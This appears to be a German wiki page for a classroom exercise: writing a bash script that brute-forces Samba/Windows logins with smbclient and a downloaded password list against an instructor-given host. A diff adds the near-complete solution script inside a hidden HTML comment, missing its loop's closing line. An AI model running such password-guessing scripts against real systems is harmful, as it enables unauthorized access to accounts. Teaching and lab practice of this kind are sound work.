Samba Password Brute-Force Aufgabe: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 20: | Zeile 20: | ||
*Ausgabe: | *Ausgabe: | ||
Das Password von uwe lautet geheim | Das Password von uwe lautet geheim | ||
| + | <!--- | ||
| + | #!/bin/bash | ||
| + | PWLISTE=$3 | ||
| + | SAMBA=$1 | ||
| + | USER=$2 | ||
| + | while read PASSWD | ||
| + | do | ||
| + | if smbclient -U $USER%$PASSWD -L $SAMBA > /dev/null | ||
| + | then | ||
| + | echo Das Password von $USER lautet $PASSWD | ||
| + | exit | ||
| + | fi | ||
| + | ---> | ||
Aktuelle Version vom 6. November 2025, 19:04 Uhr
Samba Password Brute-Force Skript
- Mit dem Programm smbclient kann man den Login auf einem Windows-/Samba-Rechner testen.
- Installiere auf dem Arbeitsrechner smbclient.
- Der Befehl smbclient -U uwe%geheim -L windows-rechner > /dev/null liefert als Exit-Status 0, wenn der Login erfolgreich war.
- Lade eine Passwortliste herunter:
wget https://xinux.de/downloads/bad-passwords
- Schreibe nun ein Shell-Skript namens smb-passwd.sh, das für die vom Dozenten vorgegebene IP die Passwörter für die folgenden Nutzer findet:
- Christine
- Martina
- Klaus
- Anforderungen an das Skript:
- Nimmt drei Positionsparameter: <samba-host> <user> <pwlist-file>
- Liest die Passwortdatei zeilenweise
- Testet für jede Zeile: smbclient -U user%pass -L host > /dev/null 2>&1
- Bei erfolgreichem Login gibt das Skript exakt aus: Das Password von <user> lautet <pass> und terminiert sofort
Beispiel Ausführung
chmod +x smb-passwd.sh ./smb-passwd.sh <IP> uwe bad-passwords
- Ausgabe:
Das Password von uwe lautet geheim